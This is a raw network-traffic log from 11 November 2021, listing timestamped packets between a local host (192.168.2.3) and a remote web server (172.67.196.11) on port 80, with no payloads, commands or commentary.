                                                                                                                              Nov 11, 2021 20:35:49.012787104 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012830973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012897968 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.012938976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.012970924 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013025045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013056040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013109922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013143063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013192892 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013225079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013273001 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.013277054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013283968 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.013309956 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013360977 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013396978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013426065 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.013444901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013492107 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013523102 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013562918 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.013575077 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013607979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013659000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013691902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013746977 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013751984 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.013787985 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013819933 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013875008 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013916969 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013950109 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.013987064 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.014019012 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.014071941 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.014102936 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.014142036 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.014147997 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.014844894 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.030607939 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030646086 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030708075 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030754089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030791044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030832052 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.030833960 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030878067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030920982 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.030922890 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.030962944 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031001091 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031060934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031100988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031147003 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031152010 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.031181097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031227112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031260014 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031311035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031342983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031390905 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.031397104 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031399012 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.031425953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031465054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031497955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031553030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031586885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031595945 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.031635046 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031668901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031721115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031752110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031804085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031836033 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031883955 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.031888008 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031891108 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.031940937 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.031989098 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032047033 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032078028 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032136917 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032147884 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.032171965 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032228947 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032273054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032330990 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032363892 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032381058 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.032413960 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032452106 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032514095 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032546043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032582998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032596111 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.032625914 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032682896 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032726049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032773018 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.032782078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032818079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.032895088 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.033175945 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.049541950 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049580097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049639940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049681902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049731970 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049756050 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.049766064 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049823999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049832106 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.049855947 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049911022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049942970 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.049947023 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.049984932 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050038099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050071955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050127029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050168991 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.050180912 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050214052 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050266981 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050298929 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050337076 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050369978 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050414085 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.050420046 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.050424099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050456047 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050513983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050549030 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050595999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050628901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050652027 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.050685883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050720930 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050770044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050801039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050853014 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050884962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050930023 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.050936937 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.050937891 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.050981045 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051012039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051068068 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051103115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051151991 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051179886 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051192999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051229954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051276922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051310062 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051317930 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051351070 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051404953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051436901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051490068 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051516056 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051522017 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051529884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051564932 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051616907 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051620007 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051651955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051707983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051740885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051794052 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051825047 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051881075 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051915884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.051950932 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051959038 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.051970005 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052014112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052047968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052093983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052139044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052144051 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.052184105 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052215099 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052267075 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052298069 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052350998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052382946 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052438021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052469969 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052495956 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.052529097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052562952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052586079 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.052618980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052656889 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.052659988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052706003 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052740097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052792072 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052824020 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052884102 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.052911043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.052942038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053000927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053035021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053062916 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053090096 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053122997 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053175926 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053231001 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053262949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053308964 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053314924 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053356886 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053375959 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053405046 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053442955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053497076 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053531885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053554058 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053577900 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053611040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053668022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053705931 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053705931 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053750038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053782940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053837061 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053838968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053858042 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053862095 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053881884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053920031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.053942919 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.053977966 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054012060 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054059029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054090023 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054143906 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054177046 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054228067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054275036 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054275036 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054322004 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054363966 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054421902 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054450989 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054465055 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054498911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054522038 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054541111 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054569006 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054616928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054626942 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054649115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054689884 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054718971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054740906 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054747105 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054759026 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054788113 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054837942 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054866076 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054913998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.054928064 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.054956913 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055002928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055036068 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055078983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055095911 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.055119038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055157900 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055187941 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055236101 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055250883 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.055268049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055308104 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055337906 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055387020 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055396080 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.055418968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055453062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055500984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055531979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055578947 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055612087 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055664062 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055670977 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.055699110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055725098 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.055742025 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055780888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055809021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055856943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055886984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055933952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.055948019 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.055963039 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056006908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056036949 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056082964 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056092978 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.056117058 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056149006 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056200027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056236029 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.056241035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056279898 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056318998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056358099 CET8049751172.67.196.11192.168.2.3
